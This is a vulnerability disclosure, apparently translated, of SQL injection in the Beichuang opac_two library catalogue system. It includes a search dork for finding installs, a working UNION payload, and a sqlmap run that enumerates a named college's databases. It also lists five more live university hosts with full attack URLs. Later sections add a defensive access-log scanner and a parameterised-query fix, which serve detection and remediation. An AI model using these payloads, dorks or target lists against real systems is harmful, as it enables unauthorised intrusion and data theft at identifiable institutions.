Insufficient input filtering in the Beichuang (北创) library catalogue system (opac_two) leads to SQL injection, affecting many universities
Baidu search: inurl:/opac_two/search2
Injection URL: /opac_two/search2/shelves_checkout.jsp?library_id= &rec_ctrl_id=
Injected parameter: rec_ctrl_id
Payload: library_id=A&rec_ctrl_id=0195033665'+and+1=2+union+select+NULL,'111111',NULL,NULL,NULL,NULL,NULL,NULL,NULL-- (against an MSSQL back-end database)
Beijing Women's College (北京女子学院), http://219.242.31.130:8080/opac_two/, is used as the test case
Test URL: http://219.242.31.130:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665
(1) UNION-based injection
http://219.242.31.130:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665'+and+1=2+union+select+NULL,'111111',NULL,NULL,NULL,NULL,NULL,NULL,NULL--
(2) Injection confirmed with sqlmap
$ py sqlmap.py -u 'http://219.242.31.130:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665' -p rec_ctrl_id --level 5 --risk 3 --random-agent --dbs -v 1 --batch
---
Place: GET
Parameter: rec_ctrl_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: library_id=A&rec_ctrl_id=0195033665' AND 8430=8430 AND 'LBSb'='LBSb
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: library_id=A&rec_ctrl_id=0195033665' UNION ALL SELECT NULL,CHAR(113)+CHAR(110)+CHAR(99)+CHAR(112)+CHAR(113)+CHAR(86)+CHAR(102)+CHAR(72)+CHAR(89)+CHAR(
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: library_id=A&rec_ctrl_id=0195033665' AND 8352=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sy
---
[18:13:54] [INFO] testing Microsoft SQL Server
[18:13:54] [INFO] confirming Microsoft SQL Server
[18:14:00] [WARNING] reflective value(s) found and filtering out
[18:14:10] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server Unknown
[18:14:14] [INFO] fetching database names
available databases [6]:
[*] master
[*] melinets
[*] model
[*] sybsystemdb
[*] sybsystemprocs
[*] tempdb
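The sqlmap output above names three techniques that worked against this endpoint (boolean-based blind, a 9-column UNION query, and a heavy-query time-based blind using sysusers). As an added example, not part of the original report, the following Python shows the defender-side counterpart: it scans web-server access-log lines for requests to shelves_checkout.jsp, URL-decodes the query parameters, flags any rec_ctrl_id or library_id value that does not fit the expected shape, and labels the flagged value with the technique signatures sqlmap reported. The log format, host, client IPs, timestamps and the parameter format rules are assumptions; the request values are the ones that appear on this page.

```python
from __future__ import annotations

import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in Apache combined format. Host, client IPs and
# timestamps are made up; the request targets are the legitimate URL and the two
# payload shapes (boolean-based, UNION) that appear on this page, URL-encoded as
# a web server would log them.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2015:18:13:50 +0800] "GET /opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2015:18:13:54 +0800] "GET /opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27%20AND%208430%3D8430%20AND%20%27LBSb%27%3D%27LBSb HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2015:18:13:55 +0800] "GET /opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Mar/2015:18:14:02 +0800] "GET /opac_two/search2/shelves_checkout.jsp?library_id=B&rec_ctrl_id=0301122334 HTTP/1.1" 200 5011 "-" "Mozilla/5.0"
"""

# Pulls the request line out of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Assumed shape of the two parameters: a record control id is a short
# alphanumeric token, a library id a short alphanumeric code. Anything else is
# flagged, whether or not a known signature matches it.
PARAM_RULES = {
    "rec_ctrl_id": re.compile(r"^[0-9A-Za-z]{1,20}$"),
    "library_id": re.compile(r"^[0-9A-Za-z]{1,8}$"),
}

# Signatures for the techniques sqlmap reported against this endpoint.
SIGNATURES = [
    ("union-query", re.compile(r"union\s+(all\s+)?select\b", re.I)),
    ("boolean-blind", re.compile(r"'\s*and\s+\d+\s*=\s*\d+", re.I)),
    ("time-blind-heavy-query", re.compile(r"select\s+count\(\*\)\s+from\s+sysusers", re.I)),
    ("char-concat-marker", re.compile(r"char\(\d+\)\s*\+\s*char\(\d+\)", re.I)),
]


def classify(value: str) -> list[str]:
    """Return the technique labels whose signature matches a decoded parameter value."""
    return [name for name, rx in SIGNATURES if rx.search(value)]


def scan_access_log(text: str) -> list[dict]:
    """Flag shelves_checkout.jsp requests whose parameters violate the expected shape."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/shelves_checkout.jsp"):
            continue
        # parse_qs decodes both %xx escapes and '+' as space, so signatures are
        # matched against what the application actually receives.
        params = parse_qs(parts.query, keep_blank_values=True)
        for name, rule in PARAM_RULES.items():
            for value in params.get(name, []):
                if rule.fullmatch(value):
                    continue
                findings.append({
                    "line": lineno,
                    "client": line.split(" ", 1)[0],
                    "param": name,
                    "value": value,
                    "techniques": classify(value) or ["malformed"],
                })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']} client {f['client']} {f['param']}: {f['techniques']}")
```

The allow-list check on the parameter shape does the real work; the signature table only explains why a flagged value looks like one of the techniques above, so a value that fits none of the signatures is still reported as malformed rather than silently accepted.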
Other test cases (all against an MSSQL back-end database):
(1)http://opac.lnu.edu.cn/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
py sqlmap.py -u 'http://opac.lnu.edu.cn/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665' -p rec_ctrl_id --level 5 --risk 3 --technique=U --union-cols=9 --dbms mssql --dbs --batch
(2)http://202.118.84.134:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
(3)http://219.218.26.4:85/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
(4)http://202.197.224.89:8088/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
(5)http://218.107.150.8/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Fix:
Filter the input parameters
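To make the fix concrete, here is an added example, not code from the vendor or from the report: the vulnerable pattern beside its hardened form, written in Python against an in-memory SQLite table standing in for the JSP application's MSSQL back end. The nine-column shelves table and its column names are constructed (nine columns matches the nine-NULL UNION payload sqlmap found); the id format rules are assumptions about what a record control id and library id look like. Running it shows that the concatenated query returns the injected '111111' marker row, that allow-list filtering rejects the payload, and that a bound parameter treats the payload as an ordinary id that simply matches nothing.

```python
import re
import sqlite3

# Constructed nine-column holdings table standing in for the OPAC's MSSQL schema.
# The real column names are not on the page; nine columns matches the
# "Generic UNION query (NULL) - 9 columns" result sqlmap reported.
SCHEMA = """
CREATE TABLE shelves (
    library_id TEXT, rec_ctrl_id TEXT, call_no TEXT, title TEXT, author TEXT,
    publisher TEXT, pub_year TEXT, location TEXT, status TEXT
);
INSERT INTO shelves VALUES ('A', '0195033665', 'TP312', 'Sample title', 'Sample author',
                            'Sample press', '2010', 'Main stacks', 'on shelf');
"""

# The injected rec_ctrl_id value from the page's payload, URL-decoded.
PAYLOAD = "0195033665' and 1=2 union select NULL,'111111',NULL,NULL,NULL,NULL,NULL,NULL,NULL--"

# Assumed formats: short alphanumeric tokens, no quotes, spaces or punctuation.
REC_CTRL_ID_RE = re.compile(r"^[0-9A-Za-z]{1,20}$")
LIBRARY_ID_RE = re.compile(r"^[0-9A-Za-z]{1,8}$")


def open_db() -> sqlite3.Connection:
    """Fresh in-memory database with one legitimate holdings row."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, library_id: str, rec_ctrl_id: str) -> list:
    """Mirrors the flaw: request parameters are spliced straight into the SQL text,
    so a quote in rec_ctrl_id ends the literal and the rest is parsed as SQL."""
    sql = (f"SELECT * FROM shelves WHERE library_id='{library_id}' "
           f"AND rec_ctrl_id='{rec_ctrl_id}'")
    return conn.execute(sql).fetchall()


def validate(library_id: str, rec_ctrl_id: str) -> bool:
    """The report's 'filter' step done as an allow-list rather than a blacklist:
    anything outside the expected shape is rejected before a query is built."""
    return bool(LIBRARY_ID_RE.fullmatch(library_id) and REC_CTRL_ID_RE.fullmatch(rec_ctrl_id))


def lookup_bound_only(conn, library_id: str, rec_ctrl_id: str) -> list:
    """Bound parameters alone: the driver sends the value as data, never as SQL text."""
    sql = "SELECT * FROM shelves WHERE library_id=? AND rec_ctrl_id=?"
    return conn.execute(sql, (library_id, rec_ctrl_id)).fetchall()


def lookup_safe(conn, library_id: str, rec_ctrl_id: str) -> list:
    """Hardened form: allow-list validation layered on top of bound parameters."""
    if not validate(library_id, rec_ctrl_id):
        raise ValueError("rejected: parameter has unexpected format")
    return lookup_bound_only(conn, library_id, rec_ctrl_id)


if __name__ == "__main__":
    db = open_db()
    print("vulnerable:", lookup_vulnerable(db, "A", PAYLOAD))   # injected marker row
    print("bound only:", lookup_bound_only(db, "A", PAYLOAD))   # [] – no such id
    print("validate  :", validate("A", PAYLOAD))                 # False
    print("safe      :", lookup_safe(db, "A", "0195033665"))    # the real holdings row
```

Validation and parameter binding address different things: the allow-list gives the application a clear place to reject junk and log it (the detection point), while the bound parameter is what actually removes the injection, since the value never reaches the SQL parser as code. In the original JSP, the equivalent of the bound query is a JDBC PreparedStatement with setString on both parameters.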